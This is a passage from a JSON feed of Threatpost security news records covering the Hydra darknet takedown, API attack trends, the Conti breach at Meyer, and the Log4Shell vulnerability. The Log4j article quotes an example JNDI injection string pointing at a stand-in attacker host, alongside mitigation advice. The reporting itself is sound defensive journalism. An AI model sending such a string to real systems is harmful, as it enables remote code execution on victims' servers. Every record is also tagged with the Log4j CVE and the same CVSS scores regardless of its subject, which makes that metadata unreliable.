Germany\u2019s Federal Criminal Police Office (BKA). \u201cTheir focus was on trading in illegal narcotics. In addition, data spied out worldwide, forged documents and digital services were offered profitably via the platform.\u201d\n\nSecurity firm Elliptic said that it confirmed the seizure, which occurred on April 5 in a series of 88 transactions amounting to 543.3 BTC, according to [a post](<https://www.elliptic.co/blog/5-billion-darknet-market-hydra-seized-by-german-authorities>) about the Hydra crackdown on Tuesday. It also said that since its inception, Hydra has pulled in around $5 billion in Bitcoin.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/04/05135041/hydra-1-e1649181164284.png>)\n\nThe banner that site visitors now see. Source: BKA.\n\nThe takedown operation has been in motion since last August, according to the notice, and included cooperation from American authorities. The investigation found that Hydra had 17 million customer accounts and boasted more than 19,000 registered sellers, with a global turnover of $1.34 billion (\u20ac1.23 billion) just in 2020. alone. Finding that information was not easy, the agencies noted.\n\n\u201cIn particular, the Bitcoin Bank Mixer, a service for obfuscating digital transactions provided by the platform, made crypto-investigations extremely difficult for law enforcement agencies,\u201d the posting noted. In the end they discovered that \u201cHydra\u2026was probably the illegal marketplace with the highest turnover worldwide.\u201d\n\nProsecutors are charging Hydra operators and administrators with charges of: commercially operating a criminal trading platform on the internet; the commercial procurement or granting of an opportunity for the unauthorized purchase or the unauthorized sale of narcotics; and commercial money laundering.\n\n## **Cracking Down on Illegal Dark Markets**\n\nGiven their status as linchpins of the [Dark Web underground economy](<https://threatpost.com/inside-ransomware-economy/166471/>) for cybercriminals and narcotics traders alike, international authorities have continued to put effort into dismantling underground markets.\n\nOne of the earliest wins was the [dismantling of Joker\u2019s Stash](<https://threatpost.com/jokers-stash-carding-site-taken-down/162548/>) in late 2020. It was a popular cybercriminal destination that specialized in trading in payment-card data, offering millions of stolen credit and debit cards to buyers. Anyone purchasing the information can create cloned cards to physically use at ATMs or at in-store machines that aren\u2019t chip-enabled; or, they can simply use the information to buy things online. Law enforcement managed to disable its blockchain DNS sites as well as Tor addresses.\n\nThen last year, Europol [announced the takedown](<https://threatpost.com/europol-dismantling-underground-marketplace/162949/>) of DarkMarket, which according to the law enforcement agency was \u201cthe world\u2019s largest illegal marketplace on the Dark Web.\u201d\n\nDarkMarket served as a marketplace for cybercriminals to buy and sell drugs, counterfeit money, stolen or counterfeit credit card data, anonymous SIM cards and malware. According to Europol, DarkMarket had almost 500,000 users and more than 2,400 sellers at the time of closure.\n\nIn addition, \u201cseveral darknet services have also voluntarily closed down over the winter of 2021-22,\u201d according Elliptic.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T17:53:47", "type": "threatpost", "title": "Authorities Fully Behead Hydra Dark Marketplace", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-05T17:53:47", "id": "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "href": "https://threatpost.com/authorities-hydra-dark-marketplace/179240/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 percent increase in attack takeovers. Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs) that \u201chave become the glue that holds today\u2019s apps together.\u201d as Cequence SecurityHacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong},'\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote \u201d \u2018 \u201d into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud, **such as the two attacks on retailers described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. Bots drove the traffic to 36M (1200 percent) to 129M (4300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game. \u201c**Attack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite patter of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Jason also offered advice for organizations to detect these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Jason that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_**[ **_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T22:00:14", "description": "Meyer Corp., maker of Farberware and the largest cookware and bakeware distributor in the U.S., has begun notifying 2,747 employees that a cyberattack that occurred on Oct. 25 compromised their personal data.\n\nMeyer filed a notice with the state of Maine [disclosing the breach](<https://apps.web.maine.gov/online/aeviewer/ME/40/722270ba-5507-4ea4-88d7-b14961dc4c2d.shtml>), which it discovered on Dec. 1. And while the report given to the Maine Attorney General doesn\u2019t specifically name the culprit behind the attack, the Conti ransomware group had already announced on its leak site on Nov. 7 it was in possession of the employee data files, according to a report this week on the [cyberattack](<https://www.securityweek.com/cookware-distribution-giant-meyer-discloses-data-breach>).\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nMeyer, based in Vallejo, Calif., was storing detailed information on its employees, including names, Social-Security numbers, driver\u2019s-license numbers and more, along with their name or other personal identifier. Other information which could now potentially be in the hands of the Conti ransomware operators include drug screening results, immigration information and health and medical information.\n\nThe company didn\u2019t reveal many additional details of the strike, but it\u2019s worth noting that Meyer is just one of many companies breached by Conti\u2019s prolific ransomware operations.\n\n## **Conti\u2019s Prolific Ransomware Operations**\n\n\u201cRansomware groups such as Conti have been a thorn in the side of organizations from almost all industries and around the world,\u201d Erich Kron, security awareness advocate for KnowBe4, told Threatpost. \u201cAttacks such as this one by the Conti group are typically a ransomware type of attack that first steals the data, then encrypts it and holds the decryption key ransom.\u201d\n\nBut even if the company pays the demanded ransom, its employees, partners and customers remain vulnerable to subsequent shakedowns.\n\n\u201cIn addition, the groups generally threaten the victim organization with exposure of the stolen data, which can include customers, employees, financial information or intellectual property, among other things, if they do not pay,\u201d Kron said.\n\nJust this month, KP Snacks, a U.K.-based food giant, was [hit by Conti ransomware](<https://threatpost.com/kp-snacks-crumbs-ransomware-attack/178176/>), causing delays in deliveries across the country.\n\n## **Keeping Conti Out of Your Cloud**\n\nKeeping such sensitive data stored in the cloud is a common practice, but leaves companies vulnerable to attack if not properly secured, Amit Shaked, CEO of Laminar, explained in response to the Meyer breach.\n\n\u201cData is no longer a commodity, it\u2019s a currency \u2014 as this incident represents. Information within an organization\u2019s network is valuable to both businesses and attackers,\u201d Shaked said via email. \u201cThis incident also reminds us that with a majority of the world\u2019s data residing in the cloud, it is imperative that security becomes data-centric and solutions become cloud-native.\u201d\n\nFull integration with the cloud is also critical, Shaked added.\n\n\u201cSolutions need to be completely integrated with the cloud in order to identify potential risks and have a deeper understanding of where the data reside,\u201d he said. \u201cUsing the dual approach of visibility and protection, data protection teams can know for certain which data stores are valuable targets and ensure proper controls, which allows for quicker discovery of any data leakage.\u201d\n\nKeeping ahead of sophisticated groups like Conti [ransomware operators](<https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/>) requires a clear, risk-based approach, Aaron Sandeen, CEO and co-founder, Cyber Security Works added.\n\n\u201cIdeally, organizations should seek out near real-time vulnerability platforms that can centralize threat data and identify, investigate and rank vulnerabilities based on weaponization \u2013 a more effective approach than waiting for reports to be formalized, interpreted and delegated,\u201d advised Sandeen.\n\nBut beyond technical solutions, Kron added strong security training for employees will also help keep cyberattackers, like Conti, at bay.\n\nBecause groups such as Conti and other bad actors use email phishing as a top method of gaining initial network access, it has never been more critical to foster a strong, good, security culture through security awareness training and regular simulated attacks.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[_LIVE roundtable discussion_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_, \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[_REGISTER NOW_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T20:41:48", "type": "threatpost", "title": "Cyberattackers Cook Up Employee Personal Data Heist for Meyer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T20:41:48", "id": "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "href": "https://threatpost.com/cyberattackers-employee-personal-data-meyer/178570/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:11:40", "description": "An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s being exploited in the wild.\n\nThe flaw first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, on Thursday. The sites [reportedly](<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>) warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.\n\nThe same day, the as-yet-unpatched flaw was dubbed \u201cLog4Shell\u201d by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) and began being tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nBy early Friday morning, the Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group [tweeted](<https://twitter.com/DTCERT/status/1469258597930614787>) that it was seeing attacks on its honeypots coming from the Tor network as threat actors tried to exploit the new bug,\n\n> \ud83d\udea8\u26a0\ufe0fNew #0-day vulnerability tracked under \"Log4Shell\" and CVE-2021-44228 discovered in Apache Log4j \ud83c\udf36\ufe0f\u203c\ufe0f We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: <https://t.co/tUKJSn8RPF> [pic.twitter.com/WkAn911rZX](<https://t.co/WkAn911rZX>)\n> \n> \u2014 Deutsche Telekom CERT (@DTCERT) [December 10, 2021](<https://twitter.com/DTCERT/status/1469258597930614787?ref_src=twsrc%5Etfw>)\n\nDitto for [CERT New Zealand](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>); and all day, people have piped up on Twitter to warn that they\u2019re also seeing in-the-wild exploits.\n\nThis problem is going to cause a mini-internet meltdown, experts said, given that Log4j is incorporated into scads of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an eye-watering number of third-party apps that may also be vulnerable to the same type of high-severity exploits as that spotted in Minecraft, as well as in cloud services such as Steam and Apple iCloud, LunaSec warned.\n\nAs of Friday, version 2.15.0 had been released: log4j-core.jar is available on Maven Central [here](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>), with release notes are [available here](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) and Apache\u2019s Log4j security announcements [available here](<https://logging.apache.org/log4j/2.x/security.html>).\n\n## **\u2018Mini-Internet Meltdown\u2019 Imminent?**\n\nEven though an initial fix was rushed out on Friday, it\u2019s going to take time to trickle down to all of those projects, given how extensively the logging library is incorporated downstream.\n\n\u201cExpect a mini-internet meltdown soonish,\u201d said British security specialist Kevin Beaumont, who [tweeted](<https://twitter.com/GossiTheDog/status/1469255367049756676>) that the fix \u201cneeds to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, appliances etc.\u201d\n\nJust one example of the bug\u2019s massive reach: On Friday morning, Rob Joyce, director of cybersecurity at the National Security Agency (NSA), [tweeted](<https://twitter.com/NSA_CSDirector/status/1469305071116636167>) that even the NSA\u2019s [GHIDRA](<https://ghidra-sre.org/>) \u2013 a suite of reverse-engineering tools developed by NSA\u2019s Research Directorate \u2013 includes the buggy Log4j library.\n\n> \u201cThe Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA\u2019s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.\u201d \u2014 _Rob Joyce, NSA Director of Cybersecurity._\n\n## Max CVSS Score of 10\n\nThe bug find has been credited to Chen Zhaojun of Alibaba. It\u2019s been assigned the [maximum CVSS score of 10](<https://logging.apache.org/log4j/2.x/security.html>), given how relatively easy it is to exploit, attackers\u2019 ability to seize control of targeted servers and the ubiquity of Log4j. According to CERT Austria, the security hole can be exploited by simply logging a special string.\n\nResearchers told Ars Technica that Log4Shell is a Java deserialization bug that stems from the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing any code that\u2019s returned. It\u2019s reportedly triggered inside of log messages with use of the ${} syntax.\n\n\u201cJNDI triggers a look-up on a server controlled by the attacker and executes the returned code,\u201d according to CERT Austria\u2019s advisory, posted Friday, which noted that code for an exploit proof-of-concept (PoC) was [published on GitHub](<https://github.com/tangxiaofeng7/apache-log4j-poc>).\n\nThe internet\u2019s reaction: \u201cUmm, yikes.\u201d\n\n\u201cThis Log4j (CVE-2021-44228) vulnerability is extremely bad,\u201d [tweeted](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) security expert Marcus Hutchins. \u201cMillions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.\u201d\n\n## Javageddon\n\nSecurity researchers don\u2019t want to say that the sky is falling, per se, but. well, it is. They\u2019re comparing this scenario to Shellshock with regards to its huge potential severity. Aka [Bashdoor](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>), Shellshock was a family of security bugs in the Unix Bash [shell ](<https://en.wikipedia.org/wiki/Shell_\\(computing\\)> \"Shell \\(computing\\)\" )present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its initial disclosure in 2014, it was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.\n\nSecurity researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, Senior Security Researcher at Huntress, who created [a PoC](<https://twitter.com/_JohnHammond/status/1469255402290401285>) for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.\n\n_\u201c_Organizations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet,\u201d he told Threatpost via email on Friday. This isn\u2019t a targeted attack, he noted, given that \u201cthere is no target.\u201d\n\nHe recommended that organizations actively using Apache log4j \u201cabsolutely must upgrade to log4j-2.1.50-rc2 as soon as possible.\u201d\n\nHammond shared this [growing list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of software and components vulnerable to Log4Shell that\u2019s being cultivated on GitHub.\n\n``\n\n## Affected Versions\n\nOn Thursday, [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) explained that affected versions are 2.0 &lt;= Apache log4j &lt;= 2.14.1.\n\nIt added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren\u2019t affected by the LDAP attack vector, given that in those versions, \u201ccom.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.\u201d\n\nVulnerability also depends on specific configurations. But there are \u201cother attack vectors targeting this vulnerability which can result in RCE,\u201d LunaSec continued. \u201cDepending on what code is present on the server, an attacker could leverage this existing code to execute a payload,\u201d pointing to a [Veracode post](<https://www.veracode.com/blog/research/exploiting-jndi-injections-java>) on an attack targeting the class org.apache.naming.factory.BeanFactory that\u2019s present on Apache Tomcat servers.\n\nLunaSec concluded that, \u201cgiven how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.\u201d\n\nOrganizations can tell if they\u2019re affected by examining log files for services using affected Log4j versions. If they contain user-controlled strings \u2013 CERT-NZ uses the example of \u201cJndi:ldap\u201d \u2013 they could be affected.\n\n\u201cIf you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,\u201d cybersecurity researchers at Randori [wrote in a blog post](<https://www.randori.com/blog/cve-2021-44228/>).\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted that a workaround released to address the flaw, which comes as part of Log4j version 2.15.0; reportedly changes a system setting from \u201cfalse\u201d to \u201ctrue\u201d by default.\n\nDon\u2019t change that, he warned: users who change the setting back to \u201cfalse\u201d remain vulnerable to attack, and as a result, \u201cit is highly recommended that this is not returned to its previous setting.,\u201d he told Threatpost on Friday. \u201cGiven the scale of affected devices and exploitability of the bug, it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors. Organizations are advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications.\u201d\n\n## Temporary Mitigation\n\nTo keep the library from being exploited, it\u2019s urgently recommended that Log4j versions are [upgraded](<https://logging.apache.org/log4j/2.x/security.html>) to log4j-2.15.0-rc1.\n\nBut for those who can\u2019t update straight off, LunaSec pointed to a [ discussion on HackerNews](<https://news.ycombinator.com/item?id=29507263>) regarding a mitigation strategy available in version 2.10.0 and higher of Log4j that was posted in the early hours of Friday morning.\n\nFor versions older than 2.10.0 that can\u2019t be upgraded, these mitigation choices have been suggested:\n\n * Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files ([here are Apache\u2019s details](<https://issues.apache.org/jira/browse/LOG4J2-2109>)); or,\n * Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application\u2019s or stack\u2019s classloading documentation to understand this behavior; or\n * Users should switch log4j2.formatMsgNoLookups to true by adding:\u201d\u2010Dlog4j2.formatMsgNoLookups=True\u201d to the JVM command for starting the application.\n\n## How the Vulnerability Works\n\nThe Huntress ThreatOps team has published [details](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>) on the vulnerability\u2019s impact and advice on what organizations should do next. Expect it and other reports to be updated as the situation unfolds.\n\nHuntress researchers said that the attack vector is \u201cextremely trivial\u201d for threat actors. As has been noted, it takes just a single text string to trigger an application to reach out to an external location if it\u2019s logged via the vulnerable instance of log4j.\n\nAs Hammond told Threatpost, a possible exploit could entail a threat actor supplying special text in an HTTP User-Agent header or a simple POST form request, with the usual form:\n\n${jndi:ldap://maliciousexternalhost.com/resource\n\n\u2026where maliciousexternalhost.com is an instance controlled by the adversary.\n\nThe log4j vulnerability parses the input and reaches out to the malicious host via the JNDI. \u201cThe first-stage resource acts as a springboard to another attacker-controlled endpoint, which serves Java code to be executed on the original victim,\u201d according to Huntress. \u201cUltimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution.\u201d\n\n## Stop, Drop, Hunt It Down\n\nSo much for baking Christmas cookies: It\u2019s going to be a long weekend for a lot of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it \u201ca worst-case scenario.\u201d\n\n\u201cThe combination of log4j\u2019s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult, and the fact that the exploit itself fits into a tweet,\u201d he told Threatpost on Friday via email.\n\nFirst things first, he said, \u201cstop what you\u2019re doing as a software shop and enumerate where log4j exists and might exist in your environment and products.\u201d\n\nHe noted that it\u2019s the kind of software \u201cthat can quite easily be there without making its presence obvious, so we expect the tail of exploitability on this vulnerability to be quite long.\u201d\n\nTim Wade, technical director of the CTO team at Vectra, told Threatpost that the specifics of how attacks will play out are \u201cstill a bit open-ended.\u201d But given the widespread use and position of the underlying software, he said, \u201cit absolutely looks like a good candidate for malicious network ingress, which means network defenders should be on guard for suspicious outbound traffic that may indicate command-and-control.\u201d\n\nWade said this is an example of how critical effective detection and response capabilities are, and \u201creally exposes how risky the \u2018prevent, patch, and pray\u2019 strategy that\u2019s so widely adopted in legacy security programs really is.\u201d\n\nJohn Bambenek, principal threat hunter at Netenrich, said that mitigations should be applied ASAP, including updating Java. He told Threatpost that Web application firewalls should also be updated with an appropriate rule to block such attacks.\n\n121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and Casey Ellis.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T17:58:04", "type": "threatpost", "title": "Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T17:58:04", "id": "THREATPOST:D098942E4435832E619282E1B92C9E0F", "href": "https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the 